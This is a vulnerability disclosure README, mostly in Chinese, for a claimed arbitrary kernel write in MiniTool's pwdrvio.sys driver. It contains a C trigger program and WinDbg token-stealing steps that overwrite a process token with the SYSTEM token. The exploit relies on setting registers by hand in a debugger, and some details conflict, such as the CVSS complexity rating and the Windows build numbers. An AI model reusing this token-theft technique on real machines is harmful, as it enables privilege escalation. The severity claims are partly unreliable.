canomer/CVE-2026-36981-Kernel-EoP-PoC

# CVE-2026-36981-Kernel-EoP-PoC MiniTool 的 pwdrvio.sys 内核驱动程序中存在内核任意写入条件。演示了一种可辅助提权的调试器辅助任意内核写入原语。 * 2026-02-09 通知供应商 * 2026-03-05 供应商确认 * 2026-03-05 向 MITRE 申请 CVE * 2026-05-10 在 90 天的协调披露期后公开披露 https://github.com/user-attachments/assets/ac81d7ce-0be7-40a5-9334-c54350e6e30e **任意内核写入 → 本地权限提升 (LPE)** **严重性：** HIGH **CVSS 3.1 评分：** 7.8 (LPE) **CVSS 向量字符串：** - LPE: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H` - 可辅助提权的调试器辅助任意内核写入原语。 - 可通过驱动偏移量 0x1641 处的任意写入原语进行利用 - 需要内核调试工具才能稳定利用 - 已在 Windows 10 Build 19045.6466 上确认 **攻击前提条件：** - 目标系统的本地访问权限 - 标准用户帐户（非管理员） - 已安装或卸载 MiniTool（已加载 pwdrvio.sys 驱动程序） **利用结果：** **LPE -** 演示了辅助提权的调试器提权 (NT AUTHORITY / SYSTEM)，导致系统完全沦陷 ## 漏洞发现时间线 ### 初始模糊测试与 BSOD 发现 **日期：** 2026 年 2 月 5 日 **活动：** 使用自定义 Python fuzzer 进行系统化内核驱动模糊测试 **发现过程：** 1. **目标选择：** - 枚举 Windows 10 VM 上已安装的内核驱动程序 - 识别出 `pwdrvio.sys` 为最旧的驱动程序（时间戳：2009 年 6 月 16 日） - 驱动程序文件：`C:\Windows\System32\drivers\pwdrvio.sys` - 设备对象：`\\.\PartitionWizardDiskAccesser\0` 2. **初始模糊测试：** - 开发使用 `ctypes` 与驱动程序交互的 Python fuzzer - 通过 `WriteFile/DeviceIoControl` 向驱动设备发送随机化数据 - **结果：** 多次蓝屏死机 (BSOD) 3. **激活验证器：** - 启用 Driver Verifier 以增强崩溃检测 verifier /standard /driver pwdrvio.sys **验证器配置：** 验证器标志: 0x001209bb 已启用的标准标志: [X] 特殊池 [X] 强制 IRQL 检查 [X] 池跟踪 [X] I/O 验证 [X] 死锁检测 [X] DMA 检查 [X] 安全检查 [X] 杂项检查 [X] DDI 合规性检查 ### WinDbg 内核调试设置 **日期：** 2026 年 2 月 5-6 日 **活动：** 建立内核调试环境以进行根本原因分析 **设置过程：** 1. **VMware 串口配置：** VMware Workstation Pro → VM 设置 ├─ 添加硬件 → 串口 ├─ 连接: "使用命名管道" ├─ 路径: \\.\pipe\com_1 ├─ 末端: "这是服务器" └─ I/O 模式: "轮询时让出 CPU" ✓ 2. **客户机 OS 配置：** REM 管理员命令提示符 bcdedit /debug on bcdedit /dbgsettings serial debugport:1 baudrate:115200 shutdown /r /t 0 3. **主机 WinDbg 连接：** WinDbg → 文件 → 附加到内核 ├─ 端口: \\.\pipe\com_1 ├─ 波特率: 115200 ├─ 管道: ✓ └─ 重新连接: ✓ 结果: "已建立内核调试器连接。" ### 根本原因分析 - 发现任意写入 **日期：** 2026 年 2 月 6 日 **活动：** 识别出任意内核写入原语 **分析步骤：** 1. **模块分析：** 1: kd> lm m pwdrvio start end module name fffff805`315f0000 fffff805`315f8000 pwdrvio (Jun 16 2009) 1: kd> !drvobj pwdrvio 2 Driver object (fffff805`XXXXXXXX) is for: \Driver\pwdrvio DriverEntry: fffff805`315f6008 DriverUnload: fffff805`315f1060 Dispatch Routines: [00] IRP_MJ_CREATE fffff805`315f108c [02] IRP_MJ_CLOSE fffff805`315f12f8 [03] IRP_MJ_READ fffff805`315f16c4 [04] IRP_MJ_WRITE fffff805`315f1564 ← Target [0e] IRP_MJ_DEVICE_CONTROL fffff805`315f1404 2. **发现易受攻击指令：** 在写入处理程序上设置断点: 1: kd> bp pwdrvio+0x1641 1: kd> g Breakpoint 0 hit pwdrvio+0x1641: fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax **关键发现：** 发现任意写入原语！ - 该指令将内核指针 (`RAX`) 写入地址 `[R11-0x10]` - `R11` 从栈帧加载: `mov r11, qword ptr [rbp+0xB8h]` - 未对目标地址进行任何验证 3. **寄存器状态分析：** 0: kd> r rax=fffff805315f1364 ← 内核代码指针 r11=ffffe60f84c38750 ← 目标地址（通过栈控制） rbp=ffffe60f84c38610 ← IRP 栈帧 0: kd> dq @rbp+0xB8 L1 ffffe60f`84c386c8 ffffe60f`84c38750 ← R11 从此处加载 ### UAF 到任意写入分析 **日期：** 2026 年 2 月 6-7 日 **活动：** 追踪从释放后使用到任意写入条件的漏洞 **内存破坏链：** 1. **IRP 分配：** 0: kd> !pool @rbp Pool page ffffe60f84c38610 region is Special pool *ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+ Pooltag Irp+ : I/O verifier allocated IRP packets 2. **缓冲区关系：** 0: kd> r rsi rsi=ffffe60f828df900 ← 用户缓冲区位置 0: kd> ? @rbp - @rsi Evaluate expression: 35823344 = 00000000`02229ef0 ← 35MB 差值！ **分析：** 无法从 RBP 帧直接访问用户缓冲区 - RBP 指向内核池中的 IRP 结构 - 用户缓冲区位于不同的内存区域 - `RBP+0xB8` 偏移量未指向用户可控缓冲区 3. **释放后使用 条件：** 驱动程序在 IRP 结构中维护悬空指针: // Ghidra 反编译 (pwdrvio+0x1564) longlong lVar1 = *(longlong *)(param_2 + 0xb8); // 从 IRP 加载 // 无验证! lVar5 = IoBuildAsynchronousFsdRequest(...); // 写入 [lVar1 - 0x10] *(code **)(lVar3 + -0x10) = FUN_00011364; // 任意写入! ### 本地权限提升开发 **日期：** 2026 年 2 月 7-8 日 **活动：** 开发了令牌窃取技术 **利用策略：** **目标：** 使用 SYSTEM 令牌覆盖当前进程令牌 **Windows EPROCESS 结构：** ``` +0x000 Pcb : _KPROCESS ... +0x4b8 Token : _EX_FAST_REF ← Token pointer location ``` **令牌窃取过程：** 1. **定位 SYSTEM 进程：** 0: kd> !process 4 0 PROCESS ffffe7875ac86200 SessionId: none Cid: 0004 Peb: 00000000 Image: System 0: kd> dq ffffe7875ac86200+4b8 L1 ffffe787`5ac866b8 ffffc08e`6642f04f ← SYSTEM 令牌值 2. **定位攻击者进程：** 0: kd> !process 0 0 poc1.exe PROCESS ffffe78760150080 SessionId: 1 Cid: 0678 Image: poc1.exe 0: kd> dq ffffe78760150080+4b8 L1 ffffe787`60150538 ffffc08e`6c37a066 ← 标准用户令牌 3. **计算目标地址：** Target = TokenPointer + 0x10 = 0xffffe78760150538 + 0x10 = 0xffffe78760150548 原因: 指令使用 [R11-0x10], 因此: (Target + 0x10) - 0x10 = Target 4. **执行令牌覆盖：** 0: kd> r rax = ffffc08e6642f04f ; SYSTEM 令牌 0: kd> r r11 = ffffe78760150548 ; 目标地址 0: kd> p ; 执行: mov [r11-10h],rax 0: kd> dq ffffe78760150538 L1 ; 验证 ffffe787`60150538 ffffc08e`6642f04f ← 令牌成功修改！ 5. **恢复执行：** 0: kd> r rip = pwdrvio + 165f ; 跳至安全返回 0: kd> r eax = 0 ; 返回成功 0: kd> bc * ; 清除断点 0: kd> g ; 继续执行 **结果：** 进程现在拥有 SYSTEM 权限！ ## 漏洞 #1：导致 LPE 的任意内核写入 ### CWE 分类 - **CWE-787:** 越界写入 - **CWE-123:** 任意写入条件 - **CWE-782:** 暴露的 IOCTL 缺乏访问控制 ### 漏洞详情 **位置：** `pwdrvio.sys` 偏移量 0x1641 **汇编：** ``` pwdrvio+0x1633: mov r11, qword ptr [rbp+0xB8h] ; Load pointer from IRP pwdrvio+0x1641: mov qword ptr [r11-10h], rax ; Arbitrary write! ``` **触发机制：** ``` HANDLE hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); char buffer[0x100]; DWORD bytesReturned; WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL); ``` **利用限制：** 此漏洞需要内核调试工具才能稳定利用，因为： 1. **寄存器控制挑战：** - 目标寄存器 `R11` 从 `[RBP+0xB8]` 加载 - `RBP` 指向内核池中的 IRP 栈帧 - 用户缓冲区位于不同的内存区域（偏移量 35MB 以上） - 无法从用户缓冲区直接控制 `[RBP+0xB8]` 2. **池内存布局：** RBP (IRP 帧): 0xffffe60f84c38610 用户缓冲区: 0xffffe60f828df900 差值: 35,823,344 字节 (35 MB) 3. **需要手动干预：** - 通过调试器将 `R11` 寄存器设置为目标地址 - 将 `RAX` 寄存器设置为 SYSTEM 令牌值 - 执行指令 - 恢复执行流 ### CVSS 3.1 评分：7.8 (HIGH) **指标：** - **攻击向量 (AV)：** 本地 - 需要本地系统访问权限 - **攻击复杂度 (AC)：** 低 - 无需特殊条件 - **所需权限 (PR)：** 低 - 标准用户即可 - **用户交互 (UI)：** 无 - 不需要用户交互 -范围 (S)：** 未改变 - 相同的安全授权 - **机密性 (C)：** 高 - 完全的文件系统访问权限 - **完整性 (I)：** 高 - 完全的系统修改权限 - **可用性 (A)：** 高 - 可导致系统崩溃或瘫痪 ### 完整代码与利用 **代码：** ``` #include #include int main() { HANDLE hDevice; DWORD bytesReturned; char buffer[0x100]; printf("[*] MiniTool PoC Trigger...\n"); printf("[*] Current User: "); system("whoami"); // 1. Connect to the Driver hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Cannot Open Driver! Error: %d\n", GetLastError()); return 1; } printf("[+] Connected. WinDbg - BP 1641.\n"); printf("[!] WinDbg - Token Change - 'g'.\n"); getchar(); // Breakpoint of WinDbg // 2. Trigger the Vulnerability (Sending Random Data to Driver) WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL); printf("[*] Completed. SYSTEM Shell Opening...\n"); // 3. If we token is changed - SYSTEM Shell system("whoami && cmd.exe"); return 0; } ``` **如何编译：** * Linux 上的 MinGW ``` ┌──(PC㉿PC)-[/dir] └─$ x86_64-w64-mingw32-gcc LPE_PoC.c -o LPE_PoC.exe -lntdll -static ``` **WinDbg 过程：** * 当我们的断点触发时 ``` 1: kd> bp pwdrvio+0x1641 1: kd> g Breakpoint 0 hit Unable to load image pwdrvio.sys, Win32 error 0n2 pwdrvio+0x1641: fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax 1: kd> !process 0 0 poc1.exe PROCESS ffff9d8f6401f080 SessionId: 1 Cid: 1948 Peb: 27a2a7000 ParentCid: 16ac DirBase: 1b2528000 ObjectTable: ffffc2093fb93140 HandleCount: 58. Image: poc1.exe 1: kd> dq ffff9d8f6401f080+4b8 L1 ffff9d8f`6401f538 ffffc209`40117738 1: kd> dq ffff9d8f6401f538 L1 ffff9d8f`6401f538 ffffc209`40117738 1: kd> !process 4 0 Searching for Process with Cid == 4 PROCESS ffff9d8f5f069040 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 001aa000 ObjectTable: ffffc2093447ac40 HandleCount: 2517. Image: System 1: kd> dq ffff9d8f5f069040+4b8 L1 ffff9d8f`5f0694f8 ffffc209`3441d8df 1: kd> r rax = ffffc2093441d8df 1: kd> r r11 = ffff9d8f6401f538 + 10 1: kd> p pwdrvio+0x1645: fffff805`315f1645 488d442440 lea rax,[rsp+40h] 1: kd> dq ffff9d8f6401f538 L1 ffff9d8f`6401f538 ffffc209`3441d8df 1: kd> r rip = pwdrvio + 0x165f 1: kd> r eax = 0 1: kd> bc * 1: kd> g ``` **终端输出：** ``` PS C:\Users\standarduser\directory> whoami # Standard User Identification PC\standarduser PS C:\Users\standarduser\directory> whoami /priv # Standard User Privs PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ================================== ======== SeShutdownPrivilege Sistemi kapat Disabled SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Enabled SeUndockPrivilege Bilgisayarı takma biriminden çıkar Disabled SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Disabled SeTimeZonePrivilege Saat dilimini değiştir Disabled PS C:\Users\standarduser\directory> whoami /groups # Standard User Groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================================= ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Yerel hesap ve Administrators grubunun üyesi Well-known group S-1-5-114 Group used for deny only BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group KONSOL OTURUMU AÇMA Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Yerel hesap Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Zorunlu Etiket\Orta Zorunlu Düzey Label S-1-16-8192 PS C:\Users\standarduser\directory> PS C:\Users\standarduser\directory> .\poc1.exe # PoC Execution [*] MiniTool PoC Tetikleyici Baslatiliyor... [*] Mevcut Kullanici: desktop-usp1rvs\kali [+] Surucu baglantisi basarili. WinDbg'da BP 1641 bekleyin. [!] WinDbg'da Token'i degistirdikten sonra 'g' deyin. [*] Islem tamamlandi. SYSTEM Shell acilmaya calisiliyor... nt authority\system Microsoft Windows [Version 10.0.19045.3803] (c) Microsoft Corporation. Tüm hakları saklıdır. C:\Users\standarduser\directory>whoami # Elevated User Identification nt authority\system C:\Users\standarduser\directory>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================= =============================================================================== ======== SeCreateTokenPrivilege Belirteç nesnesi oluştur Disabled SeAssignPrimaryTokenPrivilege İşlem düzeyi belirtecini değiştir Disabled SeLockMemoryPrivilege Sayfaları bellekte kilitle Enabled SeIncreaseQuotaPrivilege İşlem için bellek kotaları ayarla Disabled SeTcbPrivilege İşletim sisteminin parçası gibi davran Enabled SeSecurityPrivilege Denetimi ve güvenlik günlüğünü yönet Disabled SeTakeOwnershipPrivilege Dosyaların veya diğer nesnelerin sahipliğini al Disabled SeLoadDriverPrivilege Aygıt sürücüleri yükle ve kaldır Disabled SeSystemProfilePrivilege Sistem performansı profili oluştur Enabled SeSystemtimePrivilege Sistem saatini değiştir Disabled SeProfileSingleProcessPrivilege Tek işlem profili oluştur Enabled SeIncreaseBasePriorityPrivilege Zamanlama önceliğini artır Enabled SeCreatePagefilePrivilege Disk belleği dosyası oluştur Enabled SeCreatePermanentPrivilege Kalıcı paylaşılan nesneler oluştur Enabled SeBackupPrivilege Dosya ve dizinleri yedekle Disabled SeRestorePrivilege Dosya ve dizinleri geri yükle Disabled SeShutdownPrivilege Sistemi kapat Disabled SeDebugPrivilege Programların hatalarını ayıkla Enabled SeAuditPrivilege Güvenlik denetimleri oluştur Enabled SeSystemEnvironmentPrivilege Üretici yazılımı ortam değerlerini değiştir Disabled SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Enabled SeUndockPrivilege Bilgisayarı takma biriminden çıkar Disabled SeManageVolumePrivilege Birim bakım görevleri gerçekleştir Disabled SeImpersonatePrivilege Kimlik doğrulamasından sonra istemcinin özelliklerini al Enabled SeCreateGlobalPrivilege Genel nesneler oluştur Enabled SeTrustedCredManAccessPrivilege Kimlik Bilgileri Yöneticisi'ne güvenilen arayan olarak eriş Disabled SeRelabelPrivilege Nesne etiketini değiştir Disabled SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Enabled SeTimeZonePrivilege Saat dilimini değiştir Enabled SeCreateSymbolicLinkPrivilege Simgesel bağlantılar oluştur Enabled SeDelegateSessionUserImpersonatePrivilege Aynı oturumdaki farklı bir kullanıcı için bir kimliğe bürünme belirteci edinin. Enabled C:\Users\standarduser\directory>whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ==================================== ================ ============ ================================================== BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group Zorunlu Etiket\Sistem Zorunlu Düzeyi Label S-1-16-16384 ``` ## 概念验证与复现步骤 ### 前置条件 **测试环境：** - **操作系统：** Windows 10 Home Build 19045.6466 - **架构：** x64 - **MiniTool 版本：** Partition Wizard 13.5 - **驱动程序：** pwdrvio.sys（日期为 2009 年 6 月 16 日） - **用户帐户：** 标准用户（非管理员） **所需工具：** - **用于 LPE：** WinDbg (Windows Debugger)，VMware Workstation ### 复现 #2：本地权限提升（WinDbg 辅助） **步骤 1：设置内核调试环境** **A. VMware 配置** 1. 在 VMware Workstation Pro 中打开 VM 设置 2. 添加硬件 → 串口 3. 配置： - 连接："使用命名管道" - 命名管道：`\\.\pipe\com_1` - 末端："这是服务器" - 另一端："一个应用程序" - I/O 模式：✓ 轮询时让出 CPU 4. 保存并启动 VM **B. 客户机 OS 配置** ``` REM Administrator Command Prompt in VM C:\> bcdedit /debug on The operation completed successfully. C:\> bcdedit /dbgsettings serial debugport:1 baudrate:115200 The operation completed successfully. C:\> bcdedit /dbgsettings debugtype Serial debugport 1 baudrate 115200 C:\> shutdown /r /t 0 ``` **C. 主机 WinDbg 设置** 1. 打开 WinDbg (x64) 2. 文件 → 内核调试 (Ctrl+K) 3. 配置： - 选项卡：COM - 端口：`\\.\pipe\com_1` - 波特率：115200 - ✓ 管道 - ✓ 重新连接 4. 点击确定 等待连接消息： ``` Opened \\.\pipe\com_1 Waiting to reconnect... Connected to Windows 10 19041 x64 target Kernel Debugger connection established. 1: kd> ``` **步骤 2：编译概念验证** 保存为 `lpe_poc.c`： ``` #include #include int main() { HANDLE hDevice; DWORD bytesReturned; char buffer[0x100]; printf("[*] MiniTool pwdrvio.sys LPE PoC\n"); printf("[*] Current user: "); system("whoami"); // Open driver hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open driver (Error: %d)\n", GetLastError()); return 1; } printf("[+] Driver opened successfully\n"); printf("[!] Waiting for WinDbg manipulation...\n"); printf("[!] Set breakpoint: bp pwdrvio+0x1641\n"); printf("[!] Press ENTER when ready...\n"); getchar(); // Wait for WinDbg setup // Trigger vulnerability WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL); printf("[*] Exploitation complete\n"); printf("[*] Spawning SYSTEM shell...\n"); // If successful, this CMD will have SYSTEM privileges system("whoami && cmd.exe"); CloseHandle(hDevice); return 0; } ``` **在 Linux/WSL 上编译：** ``` x86_64-w64-mingw32-gcc lpe_poc.c -o lpe_poc.exe -lntdll -static ``` **步骤 3：执行利用** **A. 在 VM 中启动 PoC（标准用户）** ``` C:\> whoami desktop-lfkkhu2\standard_user C:\> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled [Limited privileges - no SeDebugPrivilege] C:\> lpe_poc.exe [*] MiniTool pwdrvio.sys LPE PoC [*] Current user: desktop-lfkkhu2\standard_user [+] Driver opened successfully [!] Waiting for WinDbg manipulation... [!] Set breakpoint: bp pwdrvio+0x1641 [!] Press ENTER when ready... [WAIT - Do not press ENTER yet] ``` **B. WinDbg 设置与操作** ``` 1: kd> bp pwdrvio+0x1641 1: kd> g ``` 现在在 PoC 中按 ENTER。WinDbg 将中断： ``` Breakpoint 0 hit pwdrvio+0x1641: fffff802`18b11641 498943f0 mov qword ptr [r11-10h],rax 0: kd> r rax=fffff80218b11364 rbx=0000000000000000 rcx=ffffe78761218e20 rdx=ffffe7875ff72e10 rsi=ffffe7875dd48f20 rdi=0000000000000000 rip=fffff80218b11641 rsp=ffff9f801c707100 rbp=ffffe7875ff72e10 r8=0000000000000001 r9=0000000000000000 r10=0000000000000000 r11=ffffe7875ff72f70 r12=0000000000000001 r13=ffffdf0a0c48ecd0 r14=0000000000000000 r15=ffffe78761218e20 ``` **C. 定位 SYSTEM 进程和令牌** ``` 0: kd> !process 4 0 Searching for Process with Cid == 4 PROCESS ffffe7875ac86200 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 001aa000 ObjectTable: ffffc08e66444c80 HandleCount: 2471 Image: System 0: kd> dq ffffe7875ac86200+4b8 L1 ffffe787`5ac866b8 ffffc08e`6642f04f ← SYSTEM token value ``` **D. 定位攻击者进程** ``` 0: kd> !process 0 0 lpe_poc.exe PROCESS ffffe78760150080 SessionId: 1 Cid: 0678 Peb: a520317000 ParentCid: 14b8 DirBase: 402a29000 ObjectTable: ffffc08e6beb0780 HandleCount: 58 Image: lpe_poc.exe 0: kd> dq ffffe78760150080+4b8 L1 ffffe787`60150538 ffffc08e`6c37a066 ← Current token (standard user) ``` **E. 执行令牌覆盖** ``` 0: kd> r rax = ffffc08e6642f04f 0: kd> r r11 = ffffe78760150538 + 10 0: kd> r r11 r11=ffffe78760150548 0: kd> p pwdrvio+0x1645: fffff802`18b11645 488d442440 lea rax,[rsp+40h] 0: kd> dq ffffe78760150538 L1 ffffe787`60150538 ffffc08e`6642f04f ← Token successfully changed! ``` **F. 恢复执行** ``` 0: kd> r rip = pwdrvio + 165f 0: kd> r eax = 0 0: kd> bc * 0: kd> g ``` **C. 在 VM 中验证权限提升** ``` [*] Exploitation complete [*] Spawning SYSTEM shell... nt authority\system Microsoft Windows [Version 10.0.19045.6466] C:\> whoami nt authority\system C:\> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================= ==================================== ======== SeCreateTokenPrivilege Create a token object Disabled SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeLockMemoryPrivilege Lock pages in memory Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeTcbPrivilege Act as part of the operating system Enabled SeSecurityPrivilege Manage auditing and security log Disabled SeTakeOwnershipPrivilege Take ownership of files/objects Disabled SeLoadDriverPrivilege Load and unload device drivers Disabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Disabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeCreatePermanentPrivilege Create permanent shared objects Enabled SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeDebugPrivilege Debug programs Enabled ← SYSTEM! SeAuditPrivilege Generate security audits Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking Disabled SeManageVolumePrivilege Perform volume maintenance tasks Disabled SeImpersonatePrivilege Impersonate a client after auth Enabled SeCreateGlobalPrivilege Create global objects Enabled SeTrustedCredManAccessPrivilege Access Credential Manager as trusted Disabled SeRelabelPrivilege Modify an object label Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Impersonate other session users Enabled C:\> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ==================================== ================ ============ ======================================= BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled, Owner Everyone Well-known group S-1-1-0 Mandatory, Enabled by default, Enabled NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory, Enabled by default, Enabled Mandatory Label\System Mandatory Level Label S-1-16-16384 ← SYSTEM integrity! ``` **MiniTool 软件：** ``` Product: MiniTool Partition Wizard Version: 13.5 Installation Path: C:\Program Files\MiniTool Partition Wizard Driver Path: C:\Windows\System32\drivers\pwdrvio.sys Driver Date: June 16, 2009 (0x4A36F8D1) Driver Size: 32,256 bytes ``` **测试工具：** ``` WinDbg Version: 10.0.29507.1001 AMD64 Python Version: 3.x with ctypes Compiler: x86_64-w64-mingw32-gcc (MinGW) Verifier: Windows Driver Verifier (Standard flags) ``` ## 受影响版本 ### 确认存在漏洞 **主要产品：** - MiniTool Partition Wizard 13.5 - 所有使用 pwdrvio.sys 的早期版本 **驱动程序详情：** ``` File Name: pwdrvio.sys File Version: [Not available] File Size: 32,256 bytes (31.5 KB) Time Stamp: 0x4A36F8D1 (June 16, 2009, 04:43:45 UTC) Digital Signature: [Signed by vendor] Device Name: \\.\PartitionWizardDiskAccesser\0 Service Name: pwdrvio Load Order: Boot Start (SERVICE_BOOT_START) ``` ### 潜在受影响 可能使用相同驱动程序的其他 MiniTool 产品： - MiniTool Power Data Recovery - MiniTool Partition Wizard Bootable Edition - MiniTool ShadowMaker **注意：** 每款产品都应单独测试以确认。 ### 操作系统兼容性 **已测试并确认存在漏洞：** - Windows 10 Home Build 19045.6466 (x64) **原因：** 驱动程序兼容所有现代 Windows 版本，且不包含特定版本检查。 ## 法律免责声明 本仓库仅出于在受控实验室环境中进行教育、防御性安全研究和漏洞复现的目的提供。 信息和概念验证代码旨在帮助防御者、研究人员和供应商理解并修复所报告的漏洞。 未经授权或恶意使用本代码攻击未经明确许可的系统，可能违反适用的法律和法规。 作者不鼓励或纵容任何非法活动，对因使用本材料造成的误用或损害不承担任何责任。 此漏洞披露报告可用于： 1. 安全研究与教育 2. 供应商通知和补丁开发 3. 保护最终用户 4. 学术与防御性安全目的 **严禁用于：** - 未经授权访问计算机系统 - 恶意利用 - 任何非法活动 研究人员在受控环境中对个人拥有的系统进行了所有测试。未对第三方系统执行任何未经授权的访问。 **报告版本：** 1.0 **最后更新：** 2026 年 2 月 9 日

标签：0day挖掘, BSOD, CVE-2026-36981, CVSS 7.8, Fuzzing, Gophish, LPE, MiniTool, PoC, pwdrvio.sys, Web报告查看器, Windows驱动漏洞, Write-What-Where, 云资产清单, 内存损坏, 内核安全, 协议分析, 客户端加密, 暴力破解, 本地提权, 权限提升, 漏洞分析, 漏洞披露, 系统提权, 网络安全, 调试技术, 路径探测, 逆向工具, 逆向工程, 隐私保护